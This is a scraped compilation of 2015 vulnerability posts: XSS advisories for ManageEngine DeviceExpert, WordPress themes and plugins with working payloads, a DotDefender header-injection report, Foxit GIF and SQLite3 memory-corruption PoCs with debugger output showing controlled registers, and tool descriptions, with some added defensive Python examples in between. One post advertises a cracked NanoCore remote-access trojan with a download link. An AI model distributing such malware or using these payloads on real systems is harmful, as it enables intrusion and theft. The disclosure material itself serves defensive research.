.. contents:: Table Of Content

Overview
========

* Title : Stored XSS Vulnerability In Manage Engine Device Expert
* Author: Kaustubh G. Padwad
* Plugin Homepage: http://www.manageengine.com/products/device-expert/
* Severity: HIGH
* Version Affected: Version 5.9.9.0 Build: 5990
* Version Tested : Version 5.9.9.0 Build: 5990
* Version patched: Separate patch release for all versions

Description
===========

About the Product
=================

DeviceExpert is a web-based, multi-vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management.

Vulnerable Parameter
--------------------

* Login Name

About Vulnerability
-------------------

This product is vulnerable to a combination of CSRF/XSS attack, meaning that if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing/social engineering), the attacker can execute arbitrary code in the admin management console. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do, by hijacking the admin's cookies etc.

Vulnerability Class
===================

Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce: (POC)
=========================

1. After setting up Manage Engine, log in to Manage Engine Device Expert.
2. Navigate to admin --> User Management --> New User.
3. Put this payload into Login Name.
4. Fill in the other details.

#####payload To Use#######################
<BODY ONLOAD=alert('Hacked_ByS3curity_B3ast')>
##########################################

5. Click Save to see the stored XSS in action.
6. Reload the page to see it as many times as you want.
7. The same can be done by CSRF also.

.. image:: stoerdXSS.jpeg
   :height: 1000 px
   :width: 1000 px
   :scale: 100 %
   :alt: XSS POC
   :align: center

Mitigation
==========

Received from the Manage Engine team:
https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip

Open DeviceExpert.zip

1. Stop the Device Expert service.
2. Please replace AdvNCM.jar under DeviceExpert_Home/lib with the one under DeviceExpert.zip/AdvNCM.jar
3. Start the Device Expert service

Change Log
==========

Disclosure
==========

11-February-2015 Reported to Developer
13-February-2015 Acknowledgement from Developer
13-March-2015 Fixed by developer
16-March-2015 Requested a CVE ID
21-March-2015 Publicly Disclosed

credits
=======

* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

Source
  14. Found a nice cracked version of NanoCore and works amazing Grin It was coded by Aeonhack and protected with NetSeal2. Now you can use it for free. The file is 100% clean and working. Enjoy! An image of the cracked version available in the download =) -=-=-=-=-=-=DOWNLOAD=-=-=-=-=-=- https://www.sendspace.com/file/xtn48r
  15. wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.

The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.

wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.

wig features:

- CMS version detection by: checksums, string matching and extraction
- Lists detected package and platform versions such as asp.net, php, openssl, apache
- Detects JavaScript libraries
- Operating system fingerprinting by matching php, apache and other packages against values in wig's database
- Checks for files of interest such as administrative login pages, readmes, etc
- Currently wig's databases include 28,000 fingerprints
- Reuse information from previous runs (save the cache)
- Implement a verbose option
- Remove dependency on 'requests'
- Support for proxy
- Proper threading support
- Included check for known vulnerabilities

Requirements

wig is built with Python 3, and is therefore not compatible with Python 2.

There are various other tools which perform similar functions such as CMS identification and issue detection:

– CMSmap – Content Management System Security Scanner
– Droopescan – Plugin Based CMS Security Scanner
– WhatWeb – Identify CMS, Blogging Platform, Stats Packages & More
– BlindElephant – Web Application Fingerprinter
– Web-Sorrow v1.48 – Version Detection, CMS Identification & Enumeration
– Wappalyzer – Web Technology Identifier (Identify CMS, JavaScript etc.)
– WPScan – WordPress Security/Vulnerability Scanner

How it works

The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overwritten by setting the '-a' flag, in which case wig will test all the known fingerprints. As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan. This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed.

Help Screen

usage: wig.py [-h] [-l INPUT_FILE] [-n STOP_AFTER] [-a] [-m] [-u] [--no_cache_load] [--no_cache_save] [-N] [--verbosity] [--proxy PROXY] [-w OUTPUT_FILE] [url]

WebApp Information Gatherer

positional arguments:
  url              The url to scan e.g. http://example.com

optional arguments:
  -h, --help       show this help message and exit
  -l INPUT_FILE    File with urls, one per line.
  -n STOP_AFTER    Stop after this amount of CMSs have been detected. Default: 1
  -a               Do not stop after the first CMS is detected
  -m               Try harder to find a match without making more requests
  -u               User-agent to use in the requests
  --no_cache_load  Do not load cached responses
  --no_cache_save  Do not save the cache for later use
  -N               Shortcut for --no_cache_load and --no_cache_save
  --verbosity, -v  Increase verbosity. Use multiple times for more info
  --proxy PROXY    Tunnel through a proxy (format: localhost:8080)
  -w OUTPUT_FILE   File to dump results into (JSON)

Example of run:

$ ./wig.py example.com

dP   dP   dP dP  .88888.
88   88   88 88 d8'   `88
88  .8P  .8P 88 88
88  d8'  d8' 88 88   YP88
88.d8P8.d8P  88 Y8.   .88
8888' Y88'   dP  `88888'

WebApp Information Gatherer

Redirected to http://www.example.com. Continue? [Y|n]:

TITLE
--- HTML TITLE ---

IP
255.255.255.256

SOFTWARE                  VERSION                               CATEGORY
Drupal                    7.28 | 7.29 | 7.30 | 7.31 | 7.32      CMS
ASP.NET                   4.0.30319.18067                       Platform
Microsoft-HTTPAPI         2.0                                   Platform
Microsoft-IIS             6.0 | 7.0 | 7.5 | 8.0                 Platform
Microsoft Windows Server  2003 SP2 | 2008 | 2008 R2 | 2012      Operating System

SOFTWARE                  VULNERABILITIES   LINK
Drupal 7.28               7                 http://cvedetails.com/version/169265
Drupal 7.29               3                 http://cvedetails.com/version/169917
Drupal 7.30               3                 http://cvedetails.com/version/169916

URL                       NOTE                      CATEGORY
/login/                   Test directory            Interesting URL
/login/index_form.html    ASP.NET detailed error    Interesting URL
/robots.txt               robots.txt index          Interesting URL
/test/                    Test directory            Interesting URL
_______________________________________________________________________________
Time: 15.7 sec   Urls: 351   Fingerprints: 28989

Link: https://github.com/jekyc/wig
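The description above says wig scores each CMS version from weighted checksum "hits" and, with '-m', compares fingerprints against every fetched URL rather than only the default path. The following added example, written for this listing and not taken from wig's source, shows one way such a scorer can work; the release file contents and paths are constructed and the weighting rule (a checksum shared by fewer versions counts for more) is an assumption, not wig's documented formula.

```python
import hashlib
from collections import defaultdict
from typing import Dict, List

# Constructed "release contents": version -> (path -> bytes). wig's real database stores
# checksums of the actual files of each CMS release; these bytes are invented for the demo.
KNOWN_FILES = {
    "7.28": {"/misc/drupal.js": b"drupal-js-rev-1", "/CHANGELOG.txt": b"Drupal 7.28"},
    "7.29": {"/misc/drupal.js": b"drupal-js-rev-1", "/CHANGELOG.txt": b"Drupal 7.29"},
    "7.30": {"/misc/drupal.js": b"drupal-js-rev-2", "/CHANGELOG.txt": b"Drupal 7.30"},
    "7.31": {"/misc/drupal.js": b"drupal-js-rev-2", "/CHANGELOG.txt": b"Drupal 7.31"},
}


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def build_db(known=KNOWN_FILES):
    """Fingerprint database: path -> checksum -> set of versions shipping that exact file."""
    db = defaultdict(lambda: defaultdict(set))
    for version, files in known.items():
        for path, content in files.items():
            db[path][md5_hex(content)].add(version)
    return db


def score_versions(db, fetched: Dict[str, bytes], match_any_path: bool = False) -> Dict[str, float]:
    """Score every version by the fetched files whose checksum it matches.

    A hit is worth 1/len(versions sharing that checksum): a file that changed in exactly
    one release is strong evidence, a file identical across many releases is weak evidence.
    match_any_path=True compares each checksum against every known path instead of only
    the path it was fetched from, the behaviour the text describes for wig's '-m' option
    when a site has moved its static resources.
    """
    scores: Dict[str, float] = defaultdict(float)
    for path, content in fetched.items():
        digest = md5_hex(content)
        tables = db.values() if match_any_path else [db.get(path, {})]
        for table in tables:
            candidates = table.get(digest)
            if not candidates:
                continue
            weight = 1.0 / len(candidates)
            for version in candidates:
                scores[version] += weight
    return dict(scores)


def most_probable(scores: Dict[str, float]) -> List[str]:
    """The version(s) with the highest score; ties are all reported, as in 'Drupal 7.30 | 7.31'."""
    if not scores:
        return []
    best = max(scores.values())
    return sorted(v for v, s in scores.items() if s == best)


if __name__ == "__main__":
    db = build_db()
    fetched = {"/misc/drupal.js": b"drupal-js-rev-2", "/CHANGELOG.txt": b"Drupal 7.30"}
    print(most_probable(score_versions(db, fetched)))   # ['7.30']
```

From a defender's side the same logic explains what a scan reveals: a single file that differs between releases (here the changelog) pins the exact version, while shared files only narrow it to a range, which is why removing or access-controlling version-revealing static files reduces what such tools can learn.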
  16. pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product. Changes: This version is compatible with python 3 (tested with 3.2.3) and python 2 (tested 2.7.3). The API for this new version is now object oriented. Useful classes are ClamdNetworkSocket and ClamdUnixSocket. Download
  17. Vulnerable soft: Applicure DotDefender (all versions)
Vendor's site: Download dotDefender 5.00 & 5.13
Vulnerabilities: Persistent XSS, Log forging, Potential DoS
When Discovered: 15 March 2015
Discovered by: AkaStep

Under some circumstances it is possible to attack DotDefender's admin interface and, as a result, conduct PHISHING/Log forging/Potential Denial Of Service against the "Log Viewer" functionality.

The main reason for the vulnerability: dotDefender's developers trust the X-Forwarded-For HTTP header and its variable (which is client-side controllable), and sadly there is no validation/sanitization of that variable and its value.

This vulnerability was successfully tested against the following configurations (in Lab/Production environment):

1) Apache Traffic Server ===> Apache 2.4
2) Apache 2.4 with mod_proxy.

Tested versions (but other versions may also be affected):

• dotDefender Version: 5.12-13217
• Web Server Type: Apache
• Server Operating System: Linux
• Web Server Version: Unknown

• dotDefender Version: 5.13-13282
• Web Server Type: Apache
• Server Operating System: Linux
• Web Server Version: Unknown

Read more: http://packetstorm.wowhacker.com/1503-exploits/DotDefender-XSS.pdf
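The advisory's root cause is an X-Forwarded-For value that is trusted and then shown in a log viewer unsanitised. The following added example, written for this listing and not dotDefender's or Apache's code, shows the two controls a log-viewing component needs: only honour X-Forwarded-For when the direct peer is one of your own reverse proxies (the constructed address 10.0.0.5 stands in for an Apache Traffic Server or mod_proxy front end), and neutralise any header text that must be recorded verbatim before it reaches the log.

```python
import html
import ipaddress
from typing import Optional

# Constructed: addresses of the reverse proxies we run in front of the application.
# A real deployment takes this list from configuration.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def client_ip(peer: str, xff: Optional[str]) -> str:
    """Return the address to attribute a request to.

    X-Forwarded-For is honoured only when the TCP peer is one of our own proxies, and
    then only the right-most entry that our proxies did not add themselves: everything
    to the left of that was supplied by the client and can be anything. A hop that is
    not a syntactically valid IP address is rejected in favour of the peer address, so
    raw header text never becomes the "client IP" that is stored or displayed.
    """
    peer_addr = ipaddress.ip_address(peer)
    if peer_addr not in TRUSTED_PROXIES or not xff:
        return str(peer_addr)
    for hop in reversed([h.strip() for h in xff.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer_addr)          # forged or malformed entry: ignore the header
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return str(peer_addr)                  # header listed only our own proxies


def sanitize_for_log(value: str, limit: int = 256) -> str:
    """Neutralise a header value that must be recorded verbatim (e.g. User-Agent).

    Control characters become '?' (a CR/LF pair would otherwise let one request write
    extra log lines: log forging), and HTML-significant characters are escaped so a
    viewer that renders entries as HTML shows them as text rather than executing them.
    """
    cleaned = "".join(c if c.isprintable() else "?" for c in value[:limit])
    return html.escape(cleaned, quote=True)


def log_entry(peer: str, xff: Optional[str], user_agent: str) -> str:
    """One log line built only from validated or escaped pieces."""
    return f'client={client_ip(peer, xff)} ua="{sanitize_for_log(user_agent)}"'


if __name__ == "__main__":
    # Constructed requests: a genuine forwarded client, then a header carrying markup.
    print(log_entry("10.0.0.5", "203.0.113.9, 10.0.0.5", "curl/7"))
    print(log_entry("10.0.0.5", "<script>alert(1)</script>", "Mozilla\r\n<b>x</b>"))
```

Parsing the header with ipaddress is the key step: the viewer only ever prints the canonical form of an address it parsed itself, so there is no path by which attacker-chosen characters reach the page, and escaping is reserved for fields that legitimately carry free text.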
  18. #####################################################################################
Application: Foxit Products GIF Conversion Memory Corruption Vulnerabilities (DataSubBlock)
Platforms: Windows
Versions: The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected.
Secunia: SA63346
{PRL}: 2015-02
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com/
Twitter: @protekResearch
#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files. Early versions of Foxit Reader were notable for startup performance and small file size. Foxit has been compared favorably to Adobe Reader. The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing. (http://en.wikipedia.org/wiki/Foxit_Reader)

#####################################################################################

============================
2) Report Timeline
============================

2015-01-22: Francis Provencher from Protek Research Lab's found the issue;
2015-01-28: Foxit Security Response Team confirmed the issue;
2015-01-28: Foxit fixed the issue;
2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF 7.1.

#####################################################################################

============================
3) Technical details
============================

An error when handling the Size member of a GIF DataSubBlock data structure can be exploited to cause memory corruption via a specially crafted GIF file.

#####################################################################################

===========
4) POC
===========

http://protekresearchlab.com/exploits/PRL-2015-02.gif
http://www.exploit-db.com/sploits/36335.gif

###############################################################################

Source
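The technical detail above is one sentence: the Size member of a GIF DataSubBlock is mishandled. A GIF data sub-block is a single Size byte (0 to 255) followed by that many bytes, repeated until a Size of 0; a reader that uses Size without first comparing it to what actually remains in the buffer reads or copies past the end. The following added example, written for this listing and not Foxit's code or the PRL proof-of-concept file, is a bounds-checked walk of a GIF's block structure; the 43-byte sample image is a constructed minimal GIF89a, and the failing input is built by inflating one Size byte.

```python
from typing import List, Tuple

# Constructed sample: a minimal 1x1 GIF89a (header, global colour table, graphic control
# extension, one image, trailer). Invented test data, not the advisory's PoC file.
MINIMAL_GIF = bytes.fromhex(
    "474946383961" "01000100" "80" "00" "00"   # 'GIF89a', 1x1, GCT present (2 entries)
    "000000ffffff"                              # global colour table
    "21f9" "04" "01000000" "00"                 # graphic control ext: one 4-byte sub-block
    "2c" "00000000" "01000100" "00"             # image descriptor, no local colour table
    "02"                                        # LZW minimum code size
    "02" "4401" "00"                            # image data: one 2-byte sub-block, terminator
    "3b"                                        # trailer
)


def read_sub_blocks(data: bytes, offset: int, limit: int = 1 << 20) -> Tuple[bytes, int]:
    """Parse a chain of GIF data sub-blocks starting at offset.

    Returns (payload, offset just past the 0x00 terminator). Every Size is checked
    against the bytes actually remaining before it is used, and the accumulated payload
    is capped, so a crafted Size can neither read past the buffer nor grow memory without
    bound; both conditions raise ValueError instead.
    """
    out = bytearray()
    pos = offset
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain: no terminator before end of data")
        size = data[pos]
        pos += 1
        if size == 0:
            return bytes(out), pos
        if size > len(data) - pos:
            raise ValueError(f"sub-block at offset {pos - 1} claims {size} bytes, "
                             f"only {len(data) - pos} remain")
        out += data[pos:pos + size]
        if len(out) > limit:
            raise ValueError("sub-block chain exceeds payload limit")
        pos += size


def _colour_table_size(packed: int) -> int:
    """Bytes of a colour table whose presence and size are encoded in a packed field."""
    return 3 * (2 ** ((packed & 0x07) + 1)) if packed & 0x80 else 0


def walk_gif(data: bytes) -> List[Tuple[str, int]]:
    """Walk the block structure of a GIF, returning (block kind, payload length) per block."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF or truncated header")
    blocks: List[Tuple[str, int]] = []
    pos = 13
    gct = _colour_table_size(data[10])
    if gct:
        if gct > len(data) - pos:
            raise ValueError("truncated global colour table")
        blocks.append(("global_color_table", gct))
        pos += gct
    while True:
        if pos >= len(data):
            raise ValueError("truncated: no trailer")
        tag = data[pos]
        pos += 1
        if tag == 0x3B:
            blocks.append(("trailer", 0))
            return blocks
        if tag == 0x21:                       # extension: label byte, then sub-blocks
            if pos >= len(data):
                raise ValueError("truncated extension")
            label = data[pos]
            payload, pos = read_sub_blocks(data, pos + 1)
            blocks.append((f"extension_0x{label:02x}", len(payload)))
        elif tag == 0x2C:                     # image descriptor: 9 bytes, optional LCT
            if len(data) - pos < 9:
                raise ValueError("truncated image descriptor")
            lct = _colour_table_size(data[pos + 8])
            pos += 9
            if lct > len(data) - pos:
                raise ValueError("truncated local colour table")
            pos += lct
            if pos >= len(data):
                raise ValueError("truncated: missing LZW minimum code size")
            payload, pos = read_sub_blocks(data, pos + 1)
            blocks.append(("image_data", len(payload)))
        else:
            raise ValueError(f"unknown block tag 0x{tag:02x} at offset {pos - 1}")


if __name__ == "__main__":
    print(walk_gif(MINIMAL_GIF))
    inflated = bytearray(MINIMAL_GIF)
    inflated[38] = 0xFF                       # image-data Size byte now claims 255 bytes
    try:
        walk_gif(bytes(inflated))
    except ValueError as err:
        print("rejected:", err)
```

The decisive comparison is `size > len(data) - pos`, evaluated before any byte is copied; it is the check a converter must make for every Size byte, not only the first, because the chain is variable-length and a crafted file can place the oversized block anywhere in it.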
  19. *WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id Parameters XSS Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.* v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
WooThemes

*Product & Vulnerable Versions:*
WordPress Daily Edition Theme
version 1.6.7
version 1.6.6
version 1.6.5
version 1.6.4
version 1.6.3
version 1.6.2
version 1.6.1
version 1.6
version 1.5
version 1.4.11
version 1.4.10
version 1.4.9
version 1.4.8
version 1.4.7
version 1.4.6
version 1.4.5
version 1.4.4
version 1.4.3
version 1.4.2
version 1.4.1
version 1.4.0
version 1.3.2
version 1.3.1
version 1.3
version 1.2.1
version 1.2
version 1.1.2
version 1.1.1
version 1.1
version 1.0.12
version 1.0.11
version 1.0.10
version 1.0.9
version 1.0.8
version 1.0.7
version 1.0.6
version 1.0.5
version 1.0.4
version 1.0.3
version 1.0.2
version 1.0.1
version 1.0

*Vendor URL & buy:*
WordPress Daily Edition Theme can be obtained from here,
http://www.woothemes.com/products/daily-edition/
http://dzv365zjfbd8v.cloudfront.net/changelogs/dailyedition/changelog.txt

*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique javascript-based featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the theme's appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management."

"Unique Features
These are some of the more unique features that you will find within the theme:
A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots.
A "talking points" home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives.
A customizable home page layout with options to specify how many full width blog posts and how many "box" posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"

*(2) Vulnerability Details:*
The WordPress Daily Edition Theme web application has a security bug. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.

*(2.1)* The programming flaw occurs on the "fiche-disque.php?" page with the "id" parameter.

*References:*
http://tetraph.com/security/xss-vulnerability/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-xss.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/
https://webtechwire.wordpress.com/2015/03/10/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142426561507008&w=2
https://cxsecurity.com/issue/WLB-2015030029

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

Source
  20. Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin

.. contents:: Table Of Content

Overview

Title : Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin
Author: Kaustubh G. Padwad, Rohit Kumar.
Plugin Homepage: https://yoast.com/wordpress/plugins/google-analytics/
Severity: Medium
Version Affected: Version 5.3.2 and mostly prior to it
Version Tested : Version 5.3.2
Version patched:

Description

Vulnerable Parameter

- Current UA-Profile
- Manually enter your UA code
- Label for those links
- Set path for internal links to track as outbound links:
- Subdomain tracking:
- Extensions of files to track as downloads:

About Vulnerability

This plugin is vulnerable to a Stored Cross Site Scripting vulnerability. This issue is exploited when administrator users have access to the "Google Analytics by Yoast" settings in WordPress; each of the above listed parameters is vulnerable to stored XSS. A malicious administrator can hijack other users' sessions, take control of another administrator's browser or install malware on their computer.

Vulnerability Class

Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce: (POC)

After installing the plugin:

1. Go to Settings --> Google Analytics by Yoast
2. Input this payload in "Manually enter your UA code":
   v style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x
3. Click on the Save Changes button and move your cursor to the input box; you will see the XSS in action.
4. Reload the page or navigate to the page again to make sure it is stored.

Mitigation

https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits

Change Log

https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits

Disclosure

22-February-2015 Reported to developer
25-February-2015 Fixed by developer
05-March-2015 Issue Closed with team.
06-March-2015 Public Disclosure

credits

Kaustubh Padwad & Rohit Kumar
Information Security Researcher
kingkaustubh@me.com & kumarrohit2255@gmail.com
@s3curityb3ast, @rkumars3c
http://breakthesec.com
https://www.linkedin.com/in/kaustubhpadwad

Source
  21. # Exploit Title: SQLite3 controlled memory corruption PoC (0day)
# Date: [date]
# Exploit Author: Andras Kabai
# Vendor Homepage: http://www.sqlite.org/
# Software Link: http://www.sqlite.org/download.html
# Version: 3.8.6, 3.8.8.3
# Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)

Using a crafted input (e.g. from a malicious file via the "-init" parameter or given directly to the standard input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker.

The following sections demonstrate the attack against the apt-get installed and updated sqlite3 and against a newer version that is built from source.

====

andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
/usr/bin/sqlite3
andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) set args < sqlitepoc.txt
(gdb) r
Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
(gdb) i r
rax            0x138              312
rbx            0x41414141424242   18367622009733698
rcx            0x7fffffffb590     140737488336272
rdx            0x0                0
rsi            0x555555779b43     93824994483011
rdi            0x41414141424242   18367622009733698
rbp            0x555555779b43     0x555555779b43
rsp            0x7fffffffb4c0     0x7fffffffb4c0
r8             0x555555779b41     93824994483009
r9             0x6c               108
r10            0x0                0
r11            0x0                0
r12            0x555555779b48     93824994483016
r13            0x7fffffffb590     140737488336272
r14            0x555555779b40     93824994483008
r15            0x2                2
rip            0x7ffff7ba06a0     0x7ffff7ba06a0 <sqlite3_load_extension+736>
eflags         0x10246            [ PF ZF IF RF ]
cs             0x33               51
ss             0x2b               43
ds             0x0                0
es             0x0                0
fs             0x0                0
gs             0x0                0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
=> 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:  call   QWORD PTR [rbx+0x48]
   0x00007ffff7ba06a3 <sqlite3_load_extension+739>:  mov    r15,rax
   0x00007ffff7ba06a6 <sqlite3_load_extension+742>:  lea    rax,[rip+0x12bc1]        # 0x7ffff7bb326e
End of assembler dump.

===

andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./lt-sqlite3...done.
(gdb) set disassembly-flavor intel
(gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
(gdb) r
Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
36169   }
(gdb) i r
rax            0x138              312
rbx            0x41414141424242   18367622009733698
rcx            0x7fffffffb510     140737488336144
rdx            0x0                0
rsi            0x6261c3           6447555
rdi            0x41414141424242   18367622009733698
rbp            0x6261c3           0x6261c3
rsp            0x7fffffffb440     0x7fffffffb440
r8             0x6261c1           6447553
r9             0x6c               108
r10            0x7fffffffb270     140737488335472
r11            0x7ffff7b5ae50     140737349267024
r12            0x6261c8           6447560
r13            0x7fffffffb510     140737488336144
r14            0x6261c0           6447552
r15            0x2                2
rip            0x7ffff7b5b130     0x7ffff7b5b130 <sqlite3_load_extension+736>
eflags         0x10246            [ PF ZF IF RF ]
cs             0x33               51
ss             0x2b               43
ds             0x0                0
es             0x0                0
fs             0x0                0
gs             0x0                0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
=> 0x00007ffff7b5b130 <sqlite3_load_extension+736>:  call   QWORD PTR [rbx+0x48]
   0x00007ffff7b5b133 <sqlite3_load_extension+739>:  mov    r15,rax
